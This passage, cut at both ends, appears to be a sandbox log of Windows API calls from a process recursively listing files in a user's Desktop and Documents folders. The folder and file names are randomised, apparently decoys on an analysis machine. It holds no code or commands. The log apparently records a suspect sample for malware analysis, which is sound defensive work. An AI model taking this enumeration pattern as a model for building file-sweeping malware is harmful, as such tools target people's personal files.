lpMem=0x6ee820 | out: hHeap=0x6b0000) returned 1 [0184.330] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5b287dc0, ftLastAccessTime.dwHighDateTime=0x1d64a6c, ftLastWriteTime.dwLowDateTime=0x5b287dc0, ftLastWriteTime.dwHighDateTime=0x1d64a6c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0184.330] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.330] lstrlenW (lpString="Desktop") returned 7 [0184.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5b287dc0, ftLastAccessTime.dwHighDateTime=0x1d64a6c, ftLastWriteTime.dwLowDateTime=0x5b287dc0, ftLastWriteTime.dwHighDateTime=0x1d64a6c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.331] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5b287dc0, ftLastAccessTime.dwHighDateTime=0x1d64a6c, ftLastWriteTime.dwLowDateTime=0x5b287dc0, ftLastWriteTime.dwHighDateTime=0x1d64a6c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.331] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.331] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9acdd510, ftCreationTime.dwHighDateTime=0x1d5e158, ftLastAccessTime.dwLowDateTime=0x27d9ec50, ftLastAccessTime.dwHighDateTime=0x1d5df3d, ftLastWriteTime.dwLowDateTime=0x27d9ec50, ftLastWriteTime.dwHighDateTime=0x1d5df3d, nFileSizeHigh=0x0, nFileSizeLow=0x173f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Lzmr6ElyVMs_z7ML.wav", cAlternateFileName="-LZMR6~1.WAV")) returned 1 [0184.331] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.331] lstrlenW (lpString="-Lzmr6ElyVMs_z7ML.wav") returned 21 [0184.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\*", lpFindFileData=0x6f8fd8 | out: lpFindFileData=0x6f8fd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41589150, ftCreationTime.dwHighDateTime=0x1d5e577, ftLastAccessTime.dwLowDateTime=0x2cc1e2d0, ftLastAccessTime.dwHighDateTime=0x1d5d976, ftLastWriteTime.dwLowDateTime=0x2cc1e2d0, ftLastWriteTime.dwHighDateTime=0x1d5d976, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb7000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.332] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6f8fd8 | out: lpFindFileData=0x6f8fd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41589150, ftCreationTime.dwHighDateTime=0x1d5e577, ftLastAccessTime.dwLowDateTime=0x2cc1e2d0, ftLastAccessTime.dwHighDateTime=0x1d5d976, ftLastWriteTime.dwLowDateTime=0x2cc1e2d0, ftLastWriteTime.dwHighDateTime=0x1d5d976, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb7000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.332] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.332] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6f8fd8 | out: lpFindFileData=0x6f8fd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ee037a0, ftCreationTime.dwHighDateTime=0x1d5e684, ftLastAccessTime.dwLowDateTime=0x2717830, ftLastAccessTime.dwHighDateTime=0x1d5e266, ftLastWriteTime.dwLowDateTime=0x2717830, ftLastWriteTime.dwHighDateTime=0x1d5e266, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb7000, dwReserved1=0x0, cFileName="77RatKR0_u1G", cAlternateFileName="77RATK~1")) returned 1 [0184.332] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.332] lstrlenW (lpString="77RatKR0_u1G") returned 12 [0184.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\*", lpFindFileData=0x6fa238 | out: lpFindFileData=0x6fa238*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ee037a0, ftCreationTime.dwHighDateTime=0x1d5e684, ftLastAccessTime.dwLowDateTime=0x2717830, ftLastAccessTime.dwHighDateTime=0x1d5e266, ftLastWriteTime.dwLowDateTime=0x2717830, ftLastWriteTime.dwHighDateTime=0x1d5e266, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.333] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fa238 | out: lpFindFileData=0x6fa238*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ee037a0, ftCreationTime.dwHighDateTime=0x1d5e684, ftLastAccessTime.dwLowDateTime=0x2717830, ftLastAccessTime.dwHighDateTime=0x1d5e266, ftLastWriteTime.dwLowDateTime=0x2717830, ftLastWriteTime.dwHighDateTime=0x1d5e266, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.333] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.333] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fa238 | out: lpFindFileData=0x6fa238*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7a6cfd0, ftCreationTime.dwHighDateTime=0x1d5d960, ftLastAccessTime.dwLowDateTime=0x84679cb0, ftLastAccessTime.dwHighDateTime=0x1d5ded9, ftLastWriteTime.dwLowDateTime=0x84679cb0, ftLastWriteTime.dwHighDateTime=0x1d5ded9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ETKxA", cAlternateFileName="")) returned 1 [0184.333] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.333] lstrlenW (lpString="ETKxA") returned 5 [0184.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\*", lpFindFileData=0x6fb498 | out: lpFindFileData=0x6fb498*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7a6cfd0, ftCreationTime.dwHighDateTime=0x1d5d960, ftLastAccessTime.dwLowDateTime=0x84679cb0, ftLastAccessTime.dwHighDateTime=0x1d5ded9, ftLastWriteTime.dwLowDateTime=0x84679cb0, ftLastWriteTime.dwHighDateTime=0x1d5ded9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebde0 [0184.333] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x6fb498 | out: lpFindFileData=0x6fb498*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7a6cfd0, ftCreationTime.dwHighDateTime=0x1d5d960, ftLastAccessTime.dwLowDateTime=0x84679cb0, ftLastAccessTime.dwHighDateTime=0x1d5ded9, ftLastWriteTime.dwLowDateTime=0x84679cb0, ftLastWriteTime.dwHighDateTime=0x1d5ded9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.333] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.333] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x6fb498 | out: lpFindFileData=0x6fb498*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc10ab90, ftCreationTime.dwHighDateTime=0x1d5d7d8, ftLastAccessTime.dwLowDateTime=0x7f7aa390, ftLastAccessTime.dwHighDateTime=0x1d5df02, ftLastWriteTime.dwLowDateTime=0x7f7aa390, ftLastWriteTime.dwHighDateTime=0x1d5df02, nFileSizeHigh=0x0, nFileSizeLow=0x5aff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cgi7U9czV8.bmp", cAlternateFileName="CGI7U9~1.BMP")) returned 1 [0184.333] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.334] lstrlenW (lpString="Cgi7U9czV8.bmp") returned 14 [0184.334] FindClose (in: hFindFile=0x6ebde0 | out: hFindFile=0x6ebde0) returned 1 [0184.334] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb498 | out: hHeap=0x6b0000) returned 1 [0184.334] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fa238 | out: lpFindFileData=0x6fa238*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43d18650, ftCreationTime.dwHighDateTime=0x1d5e0f2, ftLastAccessTime.dwLowDateTime=0xda68960, ftLastAccessTime.dwHighDateTime=0x1d5e550, ftLastWriteTime.dwLowDateTime=0xda68960, ftLastWriteTime.dwHighDateTime=0x1d5e550, nFileSizeHigh=0x0, nFileSizeLow=0x1333d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ftujisaYr n-gmxOqY.mp4", cAlternateFileName="FTUJIS~1.MP4")) returned 1 [0184.334] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.334] lstrlenW (lpString="ftujisaYr n-gmxOqY.mp4") returned 22 [0184.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\*", lpFindFileData=0x6fb598 | out: lpFindFileData=0x6fb598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64685fb0, ftCreationTime.dwHighDateTime=0x1d5e25f, ftLastAccessTime.dwLowDateTime=0xcdfcfaf0, ftLastAccessTime.dwHighDateTime=0x1d5e66d, ftLastWriteTime.dwLowDateTime=0xcdfcfaf0, ftLastWriteTime.dwHighDateTime=0x1d5e66d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebde0 [0184.334] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x6fb598 | out: lpFindFileData=0x6fb598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64685fb0, ftCreationTime.dwHighDateTime=0x1d5e25f, ftLastAccessTime.dwLowDateTime=0xcdfcfaf0, ftLastAccessTime.dwHighDateTime=0x1d5e66d, ftLastWriteTime.dwLowDateTime=0xcdfcfaf0, ftLastWriteTime.dwHighDateTime=0x1d5e66d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.334] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.334] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x6fb598 | out: lpFindFileData=0x6fb598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e9f1a80, ftCreationTime.dwHighDateTime=0x1d5ddab, ftLastAccessTime.dwLowDateTime=0xd2b4def0, ftLastAccessTime.dwHighDateTime=0x1d5e5c3, ftLastWriteTime.dwLowDateTime=0xd2b4def0, ftLastWriteTime.dwHighDateTime=0x1d5e5c3, nFileSizeHigh=0x0, nFileSizeLow=0xec11, dwReserved0=0x0, dwReserved1=0x0, cFileName="2bZi.pdf", cAlternateFileName="")) returned 1 [0184.334] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.335] lstrlenW (lpString="2bZi.pdf") returned 8 [0184.335] FindClose (in: hFindFile=0x6ebde0 | out: hFindFile=0x6ebde0) returned 1 [0184.335] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb598 | out: hHeap=0x6b0000) returned 1 [0184.335] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fa238 | out: lpFindFileData=0x6fa238*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb7ea5b0, ftCreationTime.dwHighDateTime=0x1d5e49f, ftLastAccessTime.dwLowDateTime=0x7eb74fb0, ftLastAccessTime.dwHighDateTime=0x1d5dda6, ftLastWriteTime.dwLowDateTime=0x7eb74fb0, ftLastWriteTime.dwHighDateTime=0x1d5dda6, nFileSizeHigh=0x0, nFileSizeLow=0x11afc, dwReserved0=0x0, dwReserved1=0x0, cFileName="vU451.m4a", cAlternateFileName="")) returned 1 [0184.335] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.335] lstrlenW (lpString="vU451.m4a") returned 9 [0184.335] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.335] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fa238 | out: hHeap=0x6b0000) returned 1 [0184.335] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6f8fd8 | out: lpFindFileData=0x6f8fd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e577b70, ftCreationTime.dwHighDateTime=0x1d5e700, ftLastAccessTime.dwLowDateTime=0x79a1a780, ftLastAccessTime.dwHighDateTime=0x1d5e433, ftLastWriteTime.dwLowDateTime=0x79a1a780, ftLastWriteTime.dwHighDateTime=0x1d5e433, nFileSizeHigh=0x0, nFileSizeLow=0x1488c, dwReserved0=0xb7000, dwReserved1=0x0, cFileName="klnwP9N7zks3v.swf", cAlternateFileName="KLNWP9~1.SWF")) returned 1 [0184.335] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.335] lstrlenW (lpString="klnwP9N7zks3v.swf") returned 17 [0184.335] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.336] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f8fd8 | out: hHeap=0x6b0000) returned 1 [0184.336] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe963b0d0, ftCreationTime.dwHighDateTime=0x1d5e6c8, ftLastAccessTime.dwLowDateTime=0x58ebe340, ftLastAccessTime.dwHighDateTime=0x1d5d838, ftLastWriteTime.dwLowDateTime=0x58ebe340, ftLastWriteTime.dwHighDateTime=0x1d5d838, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pgk3xDc6iN.bmp", cAlternateFileName="PGK3XD~1.BMP")) returned 1 [0184.336] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.336] lstrlenW (lpString="Pgk3xDc6iN.bmp") returned 14 [0184.336] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.336] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee820 | out: hHeap=0x6b0000) returned 1 [0184.336] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdabbaa20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdabbaa20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0184.336] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.336] lstrlenW (lpString="Documents") returned 9 [0184.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdabbaa20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdabbaa20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.336] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdabbaa20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdabbaa20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.336] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.336] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3a55270, ftCreationTime.dwHighDateTime=0x1d564d2, ftLastAccessTime.dwLowDateTime=0xe957f800, ftLastAccessTime.dwHighDateTime=0x1d5a701, ftLastWriteTime.dwLowDateTime=0xe957f800, ftLastWriteTime.dwHighDateTime=0x1d5a701, nFileSizeHigh=0x0, nFileSizeLow=0x10227, dwReserved0=0x0, dwReserved1=0x0, cFileName="51LG8hH H9MvqOtk.pptx", cAlternateFileName="51LG8H~1.PPT")) returned 1 [0184.336] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.337] lstrlenW (lpString="51LG8hH H9MvqOtk.pptx") returned 21 [0184.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\*", lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x827b1720, ftCreationTime.dwHighDateTime=0x1d5e117, ftLastAccessTime.dwLowDateTime=0x691446b0, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0x691446b0, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.337] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x827b1720, ftCreationTime.dwHighDateTime=0x1d5e117, ftLastAccessTime.dwLowDateTime=0x691446b0, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0x691446b0, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.337] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.337] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c8cab60, ftCreationTime.dwHighDateTime=0x1d5de66, ftLastAccessTime.dwLowDateTime=0xd1de7ed0, ftLastAccessTime.dwHighDateTime=0x1d5d85f, ftLastWriteTime.dwLowDateTime=0xd1de7ed0, ftLastWriteTime.dwHighDateTime=0x1d5d85f, nFileSizeHigh=0x0, nFileSizeLow=0x10338, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="06oU-LkWco7xiE.pps", cAlternateFileName="06OU-L~1.PPS")) returned 1 [0184.337] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.337] lstrlenW (lpString="06oU-LkWco7xiE.pps") returned 18 [0184.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\*", lpFindFileData=0x6fce48 | out: lpFindFileData=0x6fce48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca684710, ftCreationTime.dwHighDateTime=0x1d5e59f, ftLastAccessTime.dwLowDateTime=0xf02f5e50, ftLastAccessTime.dwHighDateTime=0x1d5dff7, ftLastWriteTime.dwLowDateTime=0xf02f5e50, ftLastWriteTime.dwHighDateTime=0x1d5dff7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61b, dwReserved1=0x4f4057e0, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.337] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fce48 | out: lpFindFileData=0x6fce48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca684710, ftCreationTime.dwHighDateTime=0x1d5e59f, ftLastAccessTime.dwLowDateTime=0xf02f5e50, ftLastAccessTime.dwHighDateTime=0x1d5dff7, ftLastWriteTime.dwLowDateTime=0xf02f5e50, ftLastWriteTime.dwHighDateTime=0x1d5dff7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61b, dwReserved1=0x4f4057e0, cFileName="..", cAlternateFileName="")) returned 1 [0184.338] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.338] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fce48 | out: lpFindFileData=0x6fce48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x781e53d0, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0xb294e1d0, ftLastAccessTime.dwHighDateTime=0x1d5db17, ftLastWriteTime.dwLowDateTime=0xb294e1d0, ftLastWriteTime.dwHighDateTime=0x1d5db17, nFileSizeHigh=0x0, nFileSizeLow=0x7bf1, dwReserved0=0x1d5e61b, dwReserved1=0x4f4057e0, cFileName="aPG49Vcbg-K-wVdwZpsT.odt", cAlternateFileName="APG49V~1.ODT")) returned 1 [0184.338] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.338] lstrlenW (lpString="aPG49Vcbg-K-wVdwZpsT.odt") returned 24 [0184.338] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.338] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fce48 | out: hHeap=0x6b0000) returned 1 [0184.338] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244401e0, ftCreationTime.dwHighDateTime=0x1d5e18e, ftLastAccessTime.dwLowDateTime=0x41305080, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x41305080, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x169df, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="AMKDqMh8xRiiO_pcCci.ppt", cAlternateFileName="AMKDQM~1.PPT")) returned 1 [0184.338] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.338] lstrlenW (lpString="AMKDqMh8xRiiO_pcCci.ppt") returned 23 [0184.340] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.341] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcaf8 | out: hHeap=0x6b0000) returned 1 [0184.341] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fb5acb0, ftCreationTime.dwHighDateTime=0x1d5da9b, ftLastAccessTime.dwLowDateTime=0x1e519ad0, ftLastAccessTime.dwHighDateTime=0x1d5e324, ftLastWriteTime.dwLowDateTime=0x1e519ad0, ftLastWriteTime.dwHighDateTime=0x1d5e324, nFileSizeHigh=0x0, nFileSizeLow=0x17ec6, dwReserved0=0x0, dwReserved1=0x0, cFileName="kOtl382XfLTV.csv", cAlternateFileName="KOTL38~1.CSV")) returned 1 [0184.341] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.341] lstrlenW (lpString="kOtl382XfLTV.csv") returned 16 [0184.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x6fd630, ftCreationTime.dwLowDateTime=0x703f50, ftCreationTime.dwHighDateTime=0x1d5e468, ftLastAccessTime.dwLowDateTime=0x6defbb70, ftLastAccessTime.dwHighDateTime=0x1d5dc36, ftLastWriteTime.dwLowDateTime=0x6defbb70, ftLastWriteTime.dwHighDateTime=0x1d5dc36, nFileSizeHigh=0x0, nFileSizeLow=0x12c3a, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="_p86ARPngS4ws5.ods", cAlternateFileName="_P86AR~1.ODS")) returned 0xffffffff [0184.341] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcaf8 | out: hHeap=0x6b0000) returned 1 [0184.341] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0184.341] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.341] lstrlenW (lpString="My Pictures") returned 11 [0184.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x6fd630, ftCreationTime.dwLowDateTime=0x703f50, ftCreationTime.dwHighDateTime=0x1d5e468, ftLastAccessTime.dwLowDateTime=0x6defbb70, ftLastAccessTime.dwHighDateTime=0x1d5dc36, ftLastWriteTime.dwLowDateTime=0x6defbb70, ftLastWriteTime.dwHighDateTime=0x1d5dc36, nFileSizeHigh=0x0, nFileSizeLow=0x12c3a, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="_p86ARPngS4ws5.ods", cAlternateFileName="_P86AR~1.ODS")) returned 0xffffffff [0184.342] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcaf8 | out: hHeap=0x6b0000) returned 1 [0184.342] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My 